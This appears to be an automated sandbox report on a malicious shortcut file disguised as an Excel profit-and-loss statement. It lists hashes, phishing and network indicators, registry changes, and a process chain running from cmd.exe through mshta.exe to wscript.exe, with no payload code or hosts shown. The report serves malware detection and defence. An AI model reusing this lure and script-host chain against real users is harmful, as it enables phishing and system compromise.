394af5b8c1c0bcdc6a4b974f0972cc6d57edafe000dc41030fe47efd9772734e

Analysis

max time kernel
151s
max time network
149s
platform
windows10_x64
resource
win10-en-20211014
submitted
04-11-2021 12:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Profit and Loss Statement.xlsx.lnk
Size

2KB
MD5

8b9fee7600633e4017337d5b56613a59
SHA1

cab6dcec5bd77f8e59b1caa330ad58f0f8280f39
SHA256

0b8d7a851920d4584777505f9fb484b226a8457d4049885a87c847f7d3532d28
SHA512

8b520bc99fcc74ba1424dd283106633b35d353b75a42c89963feac2ceebf9bafd9081be1f5dc3f1ebeeb9b8d5dc79d81d596089c06178d4b1295edd4ac3ed55a

Score

10^/10

google phishing

Malware Config

Signatures

Detected google phishing page
phishing google

Blocklisted process makes network request 24 IoCs

Processes:

mshta.exewscript.exewscript.exe

flow	pid	process
9	3992	mshta.exe
11	3992	mshta.exe
13	3992	mshta.exe
16	1480	wscript.exe
17	1432	wscript.exe
16	1480	wscript.exe
17	1432	wscript.exe
9	3992	mshta.exe
70	1480	wscript.exe
71	1432	wscript.exe
92	1480	wscript.exe
93	1432	wscript.exe
94	1480	wscript.exe
95	1432	wscript.exe
100	1480	wscript.exe
102	1432	wscript.exe
116	1480	wscript.exe
117	1432	wscript.exe
118	1480	wscript.exe
119	1432	wscript.exe
120	1480	wscript.exe
121	1432	wscript.exe
124	1480	wscript.exe
125	1432	wscript.exe

Drops file in Windows directory 3 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exe

description	ioc	process
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2148 3992 WerFault.exe mshta.exe

pid	pid_target	process	target process
2148	3992	WerFault.exe	mshta.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

Processes:

MicrosoftEdgeCP.exeMicrosoftEdge.exebrowser_broker.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\CRLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = bec27cabd9d3d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Rating Prompt Shown = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\NextPromptBuild = "15063"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 010000002603e41c50adc243e81adbf2538e24abceff7f5f6447f6e0959c699e03193d08af2f2a6dbb475c7c80eb49e59a3bc7b5bd96637739a2525faf2b84934e8be2934279fa4b238b0b106ec15b82c7e3e86e831e00f65224e2ee1734	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\NextUpdateDate = "343074375"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\google.com\NumberOfSubdomains = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 068edcbfd9d3d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 57464ba5d9d3d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\google.com\ = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$WordPress	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "c8iow24"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\google.com\ = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\docs.google.com\ = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "268435456"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{4DD732ED-83D4-4BC7-9947-2497B0575CD4}"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates\83DA05A9886F7658B	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\google.com\Total = "6"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\CTLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{3D4A5CB6-8A72-4014-B17C-406CCC14FFC1} = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 0100000004990d96b6e3aea5868fbb2ee9e7f3f40ccb9fa2aa5d4debc3f120e4795141e94cde7e92dd339a96283fbccd149f79669e43ed770377f72bf99f	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = bfdfa5a5d9d3d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total\ = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\docs.google.com\ = "6"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic	MicrosoftEdge.exe

Script User-Agent 18 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	102	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	117	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	124	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	16	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	17	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	70	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	120	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	118	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	119	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	121	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	92	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	95	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	100	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	116	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	71	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	93	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	94	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	125	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

WerFault.exe

pid	process
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe
2148	WerFault.exe

Suspicious behavior: MapViewOfSection 5 IoCs

Processes:

MicrosoftEdgeCP.exe

pid process

3420 MicrosoftEdgeCP.exe
3420 MicrosoftEdgeCP.exe
3420 MicrosoftEdgeCP.exe
3420 MicrosoftEdgeCP.exe
3420 MicrosoftEdgeCP.exe

pid	process
3420	MicrosoftEdgeCP.exe
3420	MicrosoftEdgeCP.exe
3420	MicrosoftEdgeCP.exe
3420	MicrosoftEdgeCP.exe
3420	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

WerFault.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	pid	process
Token: SeDebugPrivilege	2148	WerFault.exe
Token: SeDebugPrivilege	1620	MicrosoftEdge.exe
Token: SeDebugPrivilege	1620	MicrosoftEdge.exe
Token: SeDebugPrivilege	1620	MicrosoftEdge.exe
Token: SeDebugPrivilege	1620	MicrosoftEdge.exe
Token: SeDebugPrivilege	2992	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	2992	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	2992	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	2992	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4136	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4136	MicrosoftEdgeCP.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exe

pid process

1620 MicrosoftEdge.exe
3420 MicrosoftEdgeCP.exe
3420 MicrosoftEdgeCP.exe

pid	process
1620	MicrosoftEdge.exe
3420	MicrosoftEdgeCP.exe
3420	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.exemshta.execmd.exeMicrosoftEdgeCP.exe

description	pid	process	target process
PID 2740 wrote to memory of 3004	2740	cmd.exe	cmd.exe
PID 2740 wrote to memory of 3004	2740	cmd.exe	cmd.exe
PID 3004 wrote to memory of 3992	3004	cmd.exe	mshta.exe
PID 3004 wrote to memory of 3992	3004	cmd.exe	mshta.exe
PID 3992 wrote to memory of 804	3992	mshta.exe	explorer.exe
PID 3992 wrote to memory of 804	3992	mshta.exe	explorer.exe
PID 3992 wrote to memory of 1120	3992	mshta.exe	cmd.exe
PID 3992 wrote to memory of 1120	3992	mshta.exe	cmd.exe
PID 1120 wrote to memory of 1480	1120	cmd.exe	wscript.exe
PID 1120 wrote to memory of 1480	1120	cmd.exe	wscript.exe
PID 1120 wrote to memory of 1432	1120	cmd.exe	wscript.exe
PID 1120 wrote to memory of 1432	1120	cmd.exe	wscript.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
